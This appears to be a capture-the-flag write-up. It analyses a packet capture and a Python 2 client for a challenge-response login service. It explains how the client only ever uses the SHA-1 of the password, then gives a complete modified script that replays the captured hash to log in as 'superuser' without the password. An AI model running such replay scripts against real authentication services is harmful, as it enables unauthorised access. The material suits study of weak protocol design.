In this challenge we 2 files: 1 PCAP, 1 Python

The PCAP file contains a dialog between a client and server that goes like this:

> = client to server
< = server to client > 8e67bb26b358e2ed20fe552ed6fb832f397a507d:3daf723376f823eceeb314c8fa60e47b1ba23633
< 5f367ff47fff772986cca54219fa167175353dc7 > 78be5fe51f264a4067463bad57022348
< 3290452b9a9f6d18523347dd1daa54a1e09195a7 > 94817a6b1d833e1ffb4fcb2aa7dd14143dc5759e>_<8b060ba4b309e73abd079d8f0128056c07b78cad < Bienvenue, superuser. Le lieu du rendez-vous n'est pas encore defini. The original Python file goes like this:

#!/usr/bin/python2

import SocketServer
import socket, sys, hashlib, random


if __name__ == "__main__":
    HOST, PORT = sys.argv[1], 9999
    USER = raw_input("Utilisateur : ").strip()
    PASS = raw_input("Mot de passe : ").strip()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))

    try:    
        data = hashlib.sha1(USER).hexdigest()+":"+hashlib.sha1(hashlib.md5(hashlib.sha1(PASS).hexdigest()+hashlib.sha1(PASS).hexdigest()+hashlib.md5(USER).hexdigest()).hexdigest()).hexdigest()
        sock.sendall(data + "\n")

        challenge = sock.recv(41).strip()
        sock.sendall(hashlib.md5(hashlib.sha1(PASS).hexdigest()+"SuperSalt"+hashlib.md5(USER+challenge).hexdigest()).hexdigest() + "\n")

        challenge = sock.recv(41).strip()
        sock.sendall(hashlib.sha1(PASS).hexdigest()+">_<"+hashlib.sha1(challenge+hashlib.md5(USER).hexdigest()).hexdigest() + "\n")
        print sock.recv(1024)
    except:
        print sock.recv(1024)

    sock.close()

We need to get updated information on the meeting location so we need to do a replay attack on this service.

We are going to map the network stream to the python code:

Handshake

> 8e67bb26b358e2ed20fe552ed6fb832f397a507d:3daf723376f823eceeb314c8fa60e47b1ba23633

sha1(user) : sha1(sha1(pass)+sha1(pass)+md5(user))

Challenge 1:

< 5f367ff47fff772986cca54219fa167175353dc7 > 78be5fe51f264a4067463bad57022348

md5(sha1(pass)+"SuperSalt"+md5(user+challenge))

Challenge 2:

< 3290452b9a9f6d18523347dd1daa54a1e09195a7 > 94817a6b1d833e1ffb4fcb2aa7dd14143dc5759e>_<8b060ba4b309e73abd079d8f0128056c07b78cad sha1(pass)+">_<"+sha1(challenge+md5(user)) We can deduce: sha1(user) = 8e67bb26b358e2ed20fe552ed6fb832f397a507d sha1(pass) = 94817a6b1d833e1ffb4fcb2aa7dd14143dc5759e Google bruteforcing sha1(user) gives "superuser", which match the plain text welcome message "Bienvenue, superuser". We can also Google bruteforce the challenges but that's useless. user = "superuser" challenge1 = "4283399" challenge2 = "3593819" So we know USER, now we need PASS. But we only have sha1(pass) and it cannot be Google bruteforced. But do we really need to know PASS ? If you look closely in the code above, you will see we only use the sha1 of PASS, never anything else. Since we know USER, we can carry a replay attack. We remove all reference to PASS and put directly the sha1(pass) string.

#!/usr/bin/python2

import SocketServer
import socket, sys, hashlib, random


if __name__ == "__main__":
    HOST, PORT = "10.13.37.12", 9999
    USER = "superuser"
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))

    try:    
        sock.sendall("8e67bb26b358e2ed20fe552ed6fb832f397a507d:3daf723376f823eceeb314c8fa60e47b1ba23633" + "\n")

        challenge = sock.recv(41).strip()
        sock.sendall(hashlib.md5("94817a6b1d833e1ffb4fcb2aa7dd14143dc5759eSuperSalt"+hashlib.md5(USER+challenge).hexdigest()).hexdigest() + "\n")

        challenge = sock.recv(41).strip()
        sock.sendall("94817a6b1d833e1ffb4fcb2aa7dd14143dc5759e>_<"+hashlib.sha1(challenge+hashlib.md5(USER).hexdigest()).hexdigest() + "\n")
        print sock.recv(1024)
    except:
        print sock.recv(1024)

    sock.close()

All done.

Share